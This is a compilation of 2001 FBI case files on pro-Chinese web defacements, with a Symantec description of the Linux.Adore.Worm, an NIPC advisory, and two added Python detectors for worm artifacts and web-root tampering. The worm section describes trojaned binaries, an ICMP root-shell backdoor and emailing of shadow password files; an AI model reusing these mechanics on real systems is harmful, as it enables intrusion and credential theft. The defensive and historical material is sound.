DIRECTOR'S OFFICE 


Set to: DIRECTOR'S OFFICE 
Set to: DIRECTOR'S OFFICE 


Total leads set: 123 
Total leads not set: 1 


The following investigation was conducted by SA [redacted]. 


On 05/07/2001, SA [redacted] received multiple 
complaints from New York area businesses that suffered web site 


defacements. The following is a list of those companies that 
contacted the New York Office: 


On-Line Design 
[redacted] 
555 Theodore Fremd 
Suite A-200 
Rye, New York 10580 
914-967-7100 ext. [redacted] 

Guideline New York 
3 W. 35th Street 
New York, NY 10001 

Internet Accounting Software 
[redacted] Broadhollow Road 
Suite 420 

Softheon, Inc. 
25 East Loop Road 

IERI Technologies Inc. 
1900 Grand Ave. 
Baldwin, New York 11510 
516-8676-6752 ext. [redacted] 

Analytic 
National Football League 
[redacted] 

NFL Players Association 
[redacted] 
212-285-4700 ext. [redacted] 

On-Line Data Solutions 
1919 Middle Country Road 
Centereach, New York 11720 
631-737-4668 ext. [redacted] 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/08/2001 


To: Chicago Attn: SA [redacted] 


From: New York 
C-37 


Approved By 


Drafted By: 


Case ID #: [redacted] (Pending) 
[redacted] (Pending) 


Title: HACKER/HONKER UNION OF CHINA; 
CHICAGO SYSTEMS GROUP - VICTIM; 
IP/C 
OO:CG 


Synopsis: To provide Chicago with list of New York victims. 


Administrative: Reference telephone call between SA [redacted] 
and SA [redacted] on 05/07/2001. 


Enclosures: Enclosed for Chicago is one original, and two copies 
of an investigative insert containing listings of New York area 
victims. 


Details: On 05/07/2001, writer received several telephone calls 
from companies in the New York area that had experienced web 
defacements. All of these defacements attacked their Windows NT IIS 
systems and replaced their home pages with red text on a black 
screen that said "Fuck the US Government, Fuck Poizonbox." 


New York is not taking any investigative action in this matter, 
and is providing the list of victims for whatever action Chicago 
deems appropriate. 


To: Chicago From: New York 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO, IL 


Read and clear. Information provided for whatever 
action Chicago deems appropriate. 


++ 
FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/10/2001 


[redacted], telephone [redacted], was interviewed at his place of work, Bay Networking Technologies (BNT), 3737 [redacted], Suite 507, Mobile, Alabama 36693-4363, telephone [redacted]. 


After being advised of the identity of the interviewing agent 
and the nature of the interview, he provided the following 
information: 


BNT provides computer network maintenance and support in 
the Mobile area. One of the BNT's clients is the United Way of 
Mobile. On 05/06/2001 and again on 05/08/2001, the United Way of 
Mobile Community Alliance Network (UWM-CAN) home page was deleted 
and replaced with a web page that stated 'fuck USA Government, fuck 
PoizonBOx'. BNT has a 120 hour/month contract to support the UWM- 
CAN network for the cost of $5400/month. 


[redacted] advised the UWM-CAN web page is hosted on an Intel 
based machine running Microsoft Windows NT 4.0 with service pack 4. 
The machine had the C:\ drive shared during the time of the web 
defacement. The machine is connected through a switch to a Cisco 2620 
router, which is then connected to the Internet through their 
service provider, Actel Communications. 


[redacted], telephone [redacted], who is employed at the Mobile County Health Department Teen Center, contacted BNT at approximately 1:00 p.m. on 05/07/2001 to advise the web site had been defaced. Log files indicate the page was hacked on approximately 05/04/2001 at 7:46 p.m. [redacted] fixed the web page, applied several software patches to the server, and it was again hacked on 05/08/2001 at approximately 9:24 p.m. and replaced with the same web page. The log file from 05/04/2001 was deleted after the defacement, although the 05/08/2001 log file remained. 


[redacted] advised the files which were modified in the Inetpub 
directory were the following: index.htm, index.asp, default.htm, 
default.asp. These pages were also located and changed on the C:\ 
drive of the server computer. 


[redacted] provided a list of IP addresses he thought were suspicious, as well as a CD-ROM containing a copy of the Inetpub directory from the hacked server. 


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/16/2001 


[redacted], date of birth [redacted], was interviewed at his place of work, OnLine Information Services, 4656 Airport Boulevard, Suite 206, Mobile, Alabama, telephone [redacted]. Also present during the interview were [redacted] of the Mobile Police Department and [redacted], date of birth [redacted]. After being advised as to the identity of the interviewers and the nature of the interview, [redacted] provided the following information: 


[redacted] is [redacted] of OnLine Information Services. 
OnLine Information Services (OLIS) operates the following Internet 


domains:  OLIS.com, ALACOURT.com, USCOURTS.com, GULFMAIL.com and 
GULFMALL.com.  OLIS provides public court documents and state trial 
records for a fee to subscribers.  OLIS.com provides court records 
for Mobile and Baldwin Counties (Alabama), ALACOURT.com provides 
court records for Alabama state trial court, and USCOURTS.com 
provides online records for Cook County, Illinois. Additionally 
OLIS provides e-mail notification to subscribing attorneys 
regarding cases in which the attorneys have an interest. 


The OLIS web pages are hosted on a Microsoft Windows NT 
Server, version 4.0, with IP address 209.12.154.30. On 
approximately May 9, 2001, between 5:00 and 5:30 a.m., the 
C:\INETPUB directory, which hosts the web pages for WWW.GULFMAIL.com 
and WWW.GULFMALL.com, was replaced on the server. The INDEX.HTM 
page and DEFAULT.HTM page were replaced by an HTML page containing 
a black background with red letters that stated "fuck USA 
Government, fuckPoizonBOx.com". Two files were also added in the 
INETPUB directory, which were DEFAULT.ASP and INDEX.ASP. 


On approximately April 22nd, in what [redacted] believes is 
an unrelated incident, the Mobile Bar Association web page, which 
is hosted on the F:\ drive of the same server computer, was deleted 
and a single file remained with the name 'Shadowland'. 


[redacted] provided the FBI two CD-ROMs containing a backup 
of the INETPUB Directory from the affected server as well as log 
files from the server computer. One of the CD-ROMs contains the 


Investigation on 5/11/01 at Mobile, Alabama 
File # [redacted]  Date dictated 5/15/01  by [redacted] 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 


Continuation of FD-302 of [redacted], on 5/11/01, Page 2 


Windows registry as well as the NT backup of the affected server 
computer. 
FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/10/2001 


[redacted], also known as [redacted], date of birth [redacted], was interviewed at his place of work, The-Store.com, 3300 Old Shell Road, Mobile, Alabama, telephone [redacted]. After being advised of the identity of the interviewing agent and the nature of the interview, he provided the following information: 


[redacted] is with The-Store.com, an online retailer. On 05/03/2001 at approximately 5:45 p.m., The-Store.com's main web page was replaced with a web page from the 'Honker Union of China'. 


The-Store.com's web page is hosted by a company called NetExtra, and the servers are located in New Jersey. The contact at NetExtra is [redacted], e-mail support@fmphosting.net, telephone [redacted]. NetExtra is hosting The-Store.com's web page on a Microsoft Windows NT machine; [redacted] is unaware of which release of NT NetExtra is running. [redacted] contacted [redacted] and advised that The-Store.com was the only company web site defaced on the server he manages, even though there were several other sites hosted on the same server. The index.htm page was replaced and the web site was down for approximately 15 minutes. 


[redacted] further advised the web site had not been backed up properly at NetExtra, so it has taken approximately 150 man hours to rebuild The-Store.com's web site. [redacted] puts most of his profit from the company back into the business, so it is difficult to quantify a dollar amount loss as a result of this incident other than recovery time spent. 


[redacted] reviewed the log files and noted that the following two IP addresses were unusual: 209.17.142.62 (wilt.fireplug.net) and 146.209.128.247 (ptest.kochind.com). 


[redacted] provided the FBI copies of log files showing IP addresses of computers which accessed the web site and a copy of an email sent to him from Security-Focus.com regarding the incident. 


Investigation on 05/10/2001 at Mobile, Alabama 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/06/2001 
To: Chicago 


From: Chicago 
Squad VC-5 


Contact: SA [redacted] x3 9108 


Approved By: 


Drafted By: 
Case ID #: 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To open sub file for the above captioned case. 


Details: Due to the volume of articles dedicated to the cyber 
attacks committed by United States and Chinese based computer 
hackers against sites originating from the United States and 
China, SA [redacted] requests the following sub file be opened: 
[redacted], white male, date of birth [redacted], Social Security Account Number (SSAN) [redacted], THE EDCOMM GROUP (TEG), 501 Office Center Drive, Fort Washington, Pennsylvania (PA) 19034, telephone [redacted], was telephonically interviewed on April 30 and May 01, 2001. After being advised of the official identity of the interviewing agent and the nature of the interview, [redacted] provided the following information: 


[redacted] stated that TEG is an education communication firm. 
One of TEG's client companies is Union Bank of California (UBOC), 
located in Los Angeles, California (CA). 


[redacted] explained that at approximately 11:30AM, Eastern Daylight Time (EDT), on April 30, 2001, one of TEG's computers was attacked and that its website at www.euboc.net was defaced with pro-Chinese and anti-United States rhetoric. The website www.euboc.net is UBOC's website. [redacted] added that the physical location of the victim computer is in San Jose, CA. TEG owns the following Internet Protocol addresses: 


128.121.239.81 
128.121.236.181 
128.121.236.182 
[redacted] added that VERIO INC. (VERIO) is the hosting company for TEG and that the victim computer is leased by VERIO to TEG. [redacted] had spoken to [redacted] of VERIO, telephone (703) 642-2800, about the incident. 


Investigation on 04/30/2001 at Philadelphia, Pennsylvania (telephonically) 
[redacted], white male, date of birth [redacted], Social Security Account Number (SSAN) [redacted], THE EDCOMM GROUP (TEG), 501 Office Center Drive, Fort Washington, Pennsylvania (PA) 19034, telephone [redacted], was interviewed at his place of employment. After being advised of the official identity of the interviewing agent and the nature of the interview, [redacted] voluntarily provided the following information: 


[redacted] stated that TEG, an education communication firm, has been in existence for two years. 


[redacted] stated that TEG has a client, UNION BANK OF 
CALIFORNIA (UBOC), located in Los Angeles, California (CA). TEG 
operates one of UBOC's software applications known as Team Action 
Center (TAC). TAC is an application which helps manage and 
facilitate project management. TAC operates off of the website 
www.euboc.net. TEG manages www.euboc.net for UBOC as well as the 
TAC application. 


On April 30, 2001, at approximately 11:30AM, Eastern 
Daylight Time (EDT), UBOC informed [redacted] that their website, 
www.euboc.net, was compromised. [redacted] investigated the incident and 
found the website www.euboc.net to be defaced and modified in its 
appearance. [redacted] explained that the website no longer contained 
the home page for UBOC but rather contained Anti-United States and 
Pro-Chinese rhetoric. [redacted] added that the server operating 
www.euboc.net was running off of the Windows 2000 Operating System 
(OS) platform. 


[redacted] explained that at approximately 12:00 PM, he 
attempted to gain control of the www.euboc.net website, and 
discovered his administration account was deleted. [redacted] contacted 
VERIO, who is the hosting company for the www.euboc.net server, and 
reported the problems he was encountering. 

At 1:00PM, [redacted] stated VERIO was able to restore his 
administration account; however, VERIO was unable to restore all of 
his permissions to that account. [redacted] was able to restore the home 
page for www.euboc.net. But within an hour, the www.euboc.net home 
page was reconfigured back to the page with Anti-United States and 

Investigation on 05/10/2001 at Fort Washington, Pennsylvania 

Continuation of FD-302 of [redacted], on 05/10/2001, Page 2 


Pro-Chinese rhetoric. Immediately after the second web defacement 
incident occurred, [redacted] instructed VERIO to shut down the server. 
VERIO immediately shut down the www.euboc.net server. 


[redacted] stated that the TAC application, also known as 
eTAC, was contracted to UBOC with the value of $500,000. 
FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/15/2001 
To: Counterterrorism Attn: SSA [redacted] 
Chicago SA [redacted] 
Los Angeles SA [redacted] 
From: Philadelphia 
Squad 9 
Contact: SA [redacted] 215-418-4313 


Approved By: 


Drafted By: 
Case ID #: [redacted] (Pending) 
[redacted] (Pending) 
[redacted] (Pending) 


Title:  UNSUB(s); 
UNION BANK OF CALIFORNIA- Victim; 
INTRUSION- Banking and Finance 


Synopsis: Results of lead investigation conducted in 
Philadelphia, Pennsylvania. 


Enclosure(s): Original and one (1) copy of FD-302 interview 
reports with [redacted] for Los Angeles Division. One (1) 
information copy of FD-302 interview reports for Chicago 
Division. 

Details: On April 30, 2001, the Philadelphia office, Federal 
Bureau of Investigation (FBI) handled a computer intrusion 
complaint from [redacted], The Edcomm Group, 501 Office Center 
Drive, Fort Washington, Pennsylvania (PA) 19034, telephone 
[redacted]. 


[redacted] stated that the Edcomm Group is an education 
communication firm and that Union Bank of California is one of 
The Edcomm Group's client businesses. 


[redacted] stated that at approximately 11:30AM, Eastern 
Daylight Time (EDT), on April 30, 2001, the victim computer was 
attacked and that its website at www.euboc.net was defaced with 
pro-Chinese and Anti-United States rhetoric. [redacted] added that the 
physical location of the victim computer is in San Jose, 
California (CA). 


To: Counterterrorism, Chicago, Los Angeles From: Philadelphia 
Re: [redacted] (Pending), 05/15/2001 


[redacted] explained that the above mentioned website was 
completely compromised and eventually forced The Edcomm Group and 
Union Bank of California to transition to a secure Intranet 
architecture. The value of The Edcomm Group's contract with Union 
Bank of California is $500,000. 


Additional pertinent information regarding the incident 
was captured in the FD-302 reports on the interviews with [redacted]. 


[redacted] advised FBI Philadelphia that Union Bank had 
contacted Los Angeles FBI and was informed that an investigation 
on the incident had been opened by Los Angeles FBI. 


Philadelphia FBI contacted Los Angeles FBI to discuss 
the facts of the case and concurred that Los Angeles would open 
the investigation and Philadelphia FBI would provide any support 
to Los Angeles FBI. 


Philadelphia FBI contacted SSA [redacted], National 
Infrastructure Protection Center (NIPC). SSA [redacted] is the point 
of contact at NIPC for investigations involving Chinese hackers. 
SSA [redacted] notified Philadelphia FBI that Chicago Division had 
opened an investigation involving the Chinese hacker attacks 
occurring at the end of April and the beginning of May, 2001. 


Philadelphia FBI has had frequent contact with Chicago 
FBI regarding the Chinese Hacker attack. Chicago FBI advised 
Philadelphia FBI to collect any and all intelligence, evidence, 
and analysis of the attacks and forward them to the Chicago case 
file. 


Philadelphia FBI is forwarding appropriate information 
pertaining to the above captioned victim to Los Angeles FBI and 
all information collected by Philadelphia FBI regarding the 
Chinese Hacker attack to Chicago FBI. 


Philadelphia FBI considers the Los Angeles lead 
investigation closed in Philadelphia, PA. 
To: Counterterrorism, Chicago, Los Angeles From: Philadelphia 
Re: [redacted] (Pending), 05/15/2001 


LEAD(s): 
Set Lead 1: (Adm) 
COUNTERTERRORISM 
AT WASHINGTON, D.C. 


Read and clear. 


Set Lead 2: (Adm) 
CHICAGO 


AT CHICAGO, ILLINOIS 


Read and clear. 
Set Lead 3: (Adm) 
LOS ANGELES 


AT LOS ANGELES, CALIFORNIA 


Read and clear. 
FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/02/2001 
To: Chicago 


From: Chicago 


Squad IP/C 
Contact: SA [redacted] 312/786-3918 
Approved By: 
Drafted By: 
Case ID #: [redacted] (Pending) 
Title: CHANGED 
Subject:  Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 
Synopsis: To change title of the above captioned case. 
Previous Title: Title marked "Changed" to reflect the identification 
of the actual victim of the intrusion. Title previously carried as 
"Subject: Hacker/Honker Union of China, Victim: Chicago Systems 
Group, Type: Intrusion, Date: 04/03/2001." 

Details: On May 2, 2001, [redacted], [redacted] at Chicago Systems 
Group, was interviewed regarding a computer intrusion against one of 
his clients. During the interview, [redacted] identified the victim of 
the intrusion as the computer network controlled by the Illinois 
Secretary of State. 
++ 
Linux.Adore.Worm 


Discovered on: April 4, 2001 
Last Updated on: April 9, 2001 at 03:39:42 PM PDT 


Linux.Adore.Worm is a worm that spreads on Linux systems. The worm targets vulnerabilities commonly found on default 
installations of Linux. Using these vulnerabilities, the worm gains root access to the system, downloads and executes 
itself, and then searches for new systems to infect. 


NOTE: The Linux rootkit known as Adore is unrelated to this worm. 
Also Known As: Linux.Red.Worm 

Category: Worm 

Virus Definitions: April 5, 2001 


Threat Assessment: 


Wild: Medium    Damage: Medium    Distribution: Medium 


Wild: 


Number of infections: 50 - 999 
Number of sites: More than 10 
Geographical distribution: Medium 
Threat containment: Moderate 
Removal: Moderate 


Damage: 


Payload: 
- Modifies files: Replaces ps and klogd 
- Releases confidential info: Emails system information to anonymous addresses 
- Compromises security settings: Creates a root shell backdoor 


Distribution: 
- Target of infection: Linux systems with vulnerable wuftpd, bind, lprng, or statd 


Technical description: 


Once it gains access to a system, the worm attempts to download a tar file from go.163.com. This site appears to have been closed, causing the worm to no longer be effective. If it is able to download the file, it does the following: 


1. The worm untars the file to /usr/lib/lib and executes a script, which begins the worm routine. 

2. It replaces ps with a Trojanized version, and backs up the original to /usr/bin/adore. 

3. Next, the worm adds a script to the daily cron job, which kills all of its processes except the installed backdoor by 
rebooting or using killall on the appropriate processes. The script also replaces the Trojanized ps. This allows the 
worm to propagate for a limited amount of time, but reduces the chances of being detected. 

4. Linux.Adore.Worm then adds the users ftp and anonymous to /etc/ftpusers, blocking the wuftpd hole which it 
exploits. The worm also kills the rpc.statd, rpc.rstatd, and lpd processes, preventing those vulnerabilities from 
being exploited. 

5. Next, the worm replaces klogd (kernel message logger) with a backdoor program that uses ICMP instead of the 
traditional TCP or UDP methods. The backdoor allows root shell access. 

6. The worm then sends information to two of four email addresses located in China. The ISP has been notified 
accordingly. The information includes the IP address of the compromised computer, the process list, the history, 
hosts file, and shadow password file. 

7. Finally, the worm executes the routines to find new systems to compromise. The worm generates random class B 
IP addresses and checks to see if they are vulnerable to the common statd, LPRng, wuftp, and bind vulnerabilities. 
If vulnerable, the worm exploits the vulnerability to gain access to the system. 


Information on patching the four vulnerabilities, including links to patches, can be found at: 


- LPRng: http://www.cert.org/advisories/CA-2000-22.html 
- wu-ftpd 2.6: http://www.cert.org/advisories/CA-2000-13.html 
- Bind: http://www.cert.org/advisories/CA-2001-02.html 
- rpc.statd: http://www.cert.org/advisories/CA-2000-17.html 


Removal instructions: 


Because infected systems contain commonly exploited vulnerabilities, the system is likely to have been previously 
compromised. SARC recommends the system be imaged to a standalone system for future forensic analysis, and 
replaced with a clean installation with the latest security patches. 
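The write-up above names the artifacts the worm leaves on disk: the /usr/lib/lib staging directory, the original ps saved as /usr/bin/adore with a Trojanized copy in its place, a script dropped into the daily cron job, ftp and anonymous appended to /etc/ftpusers, and klogd replaced by an ICMP-triggered backdoor. The following is an added example, not part of the Symantec write-up or of the FBI file, of a read-only sweep for those indicators over a mounted image or a live root. Its assumptions: the write-up does not give the cron script's text, so the pattern it matches is a guess; the known-good hash for klogd has to come from the distribution's package database or a clean install of the same release; and the sample tree it builds for the demonstration is constructed, not a real capture. It only reports, in line with the removal advice above: image the host, then rebuild it.

```python
"""Read-only sweep for the on-disk artifacts of Linux.Adore.Worm listed above.

Point check_adore_indicators() at "/" on a live host or at the mount point of a
forensic image. It reports and stops; per the removal advice, an infected host is
imaged and rebuilt, not cleaned in place.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Artifact locations named in the write-up, without the leading "/" so they can
# be joined onto any root directory.
WORM_DIR = "usr/lib/lib"       # the downloaded tar file is extracted here
PS_BACKUP = "usr/bin/adore"    # the original ps is backed up here; the trojan takes its place
PS_PATH = "bin/ps"
KLOGD_PATH = "sbin/klogd"      # replaced with an ICMP-triggered root shell
FTPUSERS = "etc/ftpusers"      # worm appends ftp and anonymous to close the wu-ftpd hole behind it
CRON_DAILY = "etc/cron.daily"  # worm drops a cleanup script here; its name is not in the write-up

# The write-up describes what the cron script does (killall on the worm's processes,
# swapping ps back) but not its text, so this pattern is an assumption, not a
# published signature.
CRON_PATTERN = re.compile(r"adore|/usr/lib/lib|killall", re.IGNORECASE)


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_adore_indicators(root, known_good=None):
    """Return (severity, message) findings for the filesystem rooted at root.

    known_good maps relative paths such as "sbin/klogd" to the sha256 of the clean
    binary, taken from the distribution's package database or a clean install of
    the same release.
    """
    root = Path(root)
    findings = []

    if (root / WORM_DIR).is_dir():
        findings.append(("high", f"worm staging directory present: /{WORM_DIR}"))

    backup, ps = root / PS_BACKUP, root / PS_PATH
    if backup.is_file():
        findings.append(("high", f"backup of original ps present: /{PS_BACKUP}"))
        # The backup is the genuine ps, so a /bin/ps that differs from it is the trojan.
        if ps.is_file() and sha256_of(ps) != sha256_of(backup):
            findings.append(("high", f"/{PS_PATH} differs from /{PS_BACKUP}: ps is trojanized"))

    cron = root / CRON_DAILY
    if cron.is_dir():
        for script in sorted(cron.iterdir()):
            if script.is_file() and CRON_PATTERN.search(script.read_text(errors="replace")):
                findings.append(("medium", f"cron.daily script references worm artifacts: /{CRON_DAILY}/{script.name}"))

    ftpusers = root / FTPUSERS
    if ftpusers.is_file():
        users = {ln.strip() for ln in ftpusers.read_text(errors="replace").splitlines()
                 if ln.strip() and not ln.lstrip().startswith("#")}
        if {"ftp", "anonymous"} <= users:
            # Weak alone: many distributions ship both entries. Meaningful only
            # alongside the findings above.
            findings.append(("low", f"ftp and anonymous both listed in /{FTPUSERS}"))

    for rel, digest in (known_good or {}).items():
        target = root / rel
        if target.is_file() and sha256_of(target) != digest:
            findings.append(("high", f"/{rel} does not match its known-good hash"))

    return findings


GENUINE_KLOGD = b"ELF genuine klogd (constructed)"


def build_sample_tree(base, infected: bool) -> Path:
    """Constructed root filesystem for the demonstration; not a real capture."""
    root = Path(base)
    for d in ("usr/bin", "bin", "sbin", "etc", CRON_DAILY):
        (root / d).mkdir(parents=True, exist_ok=True)
    (root / PS_PATH).write_bytes(b"ELF genuine ps (constructed)")
    (root / KLOGD_PATH).write_bytes(GENUINE_KLOGD)
    (root / FTPUSERS).write_text("root\ndaemon\n")
    (root / CRON_DAILY / "0anacron").write_text("#!/bin/sh\n/usr/sbin/anacron -s\n")
    if infected:
        (root / WORM_DIR).mkdir(parents=True)
        (root / PS_BACKUP).write_bytes(b"ELF genuine ps (constructed)")
        (root / PS_PATH).write_bytes(b"ELF trojanized ps (constructed)")
        (root / KLOGD_PATH).write_bytes(b"ELF ICMP backdoor posing as klogd (constructed)")
        (root / FTPUSERS).write_text("root\ndaemon\nftp\nanonymous\n")
        (root / CRON_DAILY / "cleanup").write_text("#!/bin/sh\nkillall -9 start.sh\ncp /usr/bin/adore /bin/ps\n")
    return root


def run_sample(infected: bool = True):
    """Build a sample tree and sweep it; returns the findings list."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp, infected)
        return check_adore_indicators(root, {KLOGD_PATH: hashlib.sha256(GENUINE_KLOGD).hexdigest()})


if __name__ == "__main__":
    for severity, message in run_sample():
        print(f"[{severity:6}] {message}")
```

Run it against a mounted image rather than the live system where you can: the replaced ps hides the worm's processes from anything that trusts the infected host's own binaries, which is exactly why the sweep compares file hashes instead of asking ps. The ftpusers check is deliberately rated low; on its own it proves nothing.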


Write-up by: Eric Chien 
Increased Internet Attacks Against 
U.S. Web Sites and Mail Servers Possible in Early May 


(Advisory 01-009) 


April 26, 2001 


Citing recent events between the United States and the People's Republic of China 
(PRC), malicious hackers have escalated web page defacements over the Internet. This 
communication is to advise network administrators of the potential for increased hacker activity 
directed at U.S. systems during the period of April 30, 2001 to May 7, 2001. Chinese hackers 
have publicly discussed increasing their activity during this period, which coincides with dates of 
historic significance in the PRC: May 1 is May Day; May 4 is Youth Day; and, May 7 is the 
anniversary of the accidental bombing of the Chinese Embassy in Belgrade. 


To date, hackers already have unlawfully defaced a number of U.S. web sites, replacing 
existing content with pro-Chinese or anti-U.S. rhetoric. In addition, the NIPC previously 
reported on an Internet worm named "Lion" that is infecting computers and installing distributed 
denial of service (DDOS) tools on various systems. Analysis of the Lion worm's source code 
reveals that, when illegally exploited, it sends password files from the victim site to an email 
address located in China. For more information on the Lion DDOS tool, refer to NIPC Advisory 
01-005. 


As a result of the activity already seen, together with public statements threatening 
increased illegal activity, network and system administrators are encouraged to more closely 
monitor their web sites and mail servers during April 30, 2001 through May 7, 2001 for attacks 
that could include web page defacements and denial-of-service attacks. 


Recipients of this advisory are encouraged to report computer intrusions to their local FBI 
office (http://www.fbi.gov/contact/fo/fo.htm) or the NIPC, and to other appropriate authorities. 
Incidents may be reported online at http://www.NIPC.gov/incident/cirr.htm. The NIPC Watch 
and Warning Unit can be reached at (202) 323-3204/3205/3206 or NIPC.Watch@fbi.gov. 
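The Mobile interviews above (INDEX.HTM and DEFAULT.HTM overwritten, DEFAULT.ASP and INDEX.ASP added under Inetpub, the IIS log from the first intrusion deleted afterwards) and this advisory's request that administrators monitor their web sites point at the same control: a hash baseline of the web root, kept off the server, compared against the live tree on a schedule. The following is an added example, not code from any of the page's sources, of such a baseline-and-diff check that also greps the changed files for the phrases quoted in the reports. The Inetpub-style layout and page contents it builds are constructed for the demonstration; the marker phrases are the ones the defacements above used.

```python
"""Hash-baseline integrity check for an IIS (or any) web root.

snapshot() is run on a known-good copy and the result stored off the server;
diff_snapshots() is then run against the live tree on a schedule, and changed
files are grepped for the phrases the defacements above used.
"""
import hashlib
import json
import tempfile
from pathlib import Path

# Phrases quoted in the defacement reports above; matched case-insensitively.
DEFACEMENT_MARKERS = ("fuck usa government", "poizonbox", "honker union of china")


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(webroot) -> dict:
    """Map every file under webroot (relative path, forward slashes) to its sha256."""
    webroot = Path(webroot)
    return {p.relative_to(webroot).as_posix(): sha256_of(p)
            for p in sorted(webroot.rglob("*")) if p.is_file()}


def save_baseline(snap: dict, path) -> None:
    Path(path).write_text(json.dumps(snap, indent=1, sort_keys=True))


def load_baseline(path) -> dict:
    return json.loads(Path(path).read_text())


def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Classify every path as added, removed or modified relative to the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def scan_for_markers(webroot, rel_paths) -> list:
    """Return the subset of rel_paths whose content contains a defacement phrase."""
    webroot = Path(webroot)
    hits = []
    for rel in rel_paths:
        text = (webroot / rel).read_bytes().decode("latin-1").lower()
        if any(marker in text for marker in DEFACEMENT_MARKERS):
            hits.append(rel)
    return hits


# Constructed stand-in for the red-on-black page described in the reports.
DEFACED_PAGE = ('<html><body bgcolor="black"><font color="red">'
                'fuck USA Government, fuck PoizonBOx</font></body></html>')


def build_sample_webroot(base, defaced: bool) -> Path:
    """Constructed Inetpub-style tree for the demonstration; returns the wwwroot path."""
    www = Path(base) / "wwwroot"
    (www / "images").mkdir(parents=True, exist_ok=True)
    (www / "index.htm").write_text("<html><body>Welcome to the store</body></html>")
    (www / "default.htm").write_text("<html><body>Welcome to the store</body></html>")
    (www / "images" / "logo.gif").write_bytes(b"GIF89a\x01\x00\x01\x00 (constructed)")
    if defaced:
        # Same pattern as the reports: .htm pages overwritten, .asp pages added.
        for name in ("index.htm", "default.htm", "index.asp", "default.asp"):
            (www / name).write_text(DEFACED_PAGE)
    return www


def run_sample():
    """Baseline a clean tree, diff a defaced one; returns (changes, flagged_files)."""
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as live:
        clean_www = build_sample_webroot(clean, defaced=False)
        baseline_file = Path(clean) / "baseline.json"   # in practice kept off the web server
        save_baseline(snapshot(clean_www), baseline_file)

        live_www = build_sample_webroot(live, defaced=True)
        changes = diff_snapshots(load_baseline(baseline_file), snapshot(live_www))
        flagged = scan_for_markers(live_www, changes["added"] + changes["modified"])
        return changes, flagged


if __name__ == "__main__":
    changes, flagged = run_sample()
    print(json.dumps(changes, indent=1))
    print("defacement phrases in:", flagged)
```

Added files matter as much as modified ones: IIS serves whichever default document comes first in the site's configured order, so restoring index.htm while a dropped default.asp stays behind can leave the defacement live. Keep the baseline JSON and the comparison host off the web server; the Mobile report shows the log from the first intrusion was deleted, and a baseline stored next to the web root can be rewritten the same way.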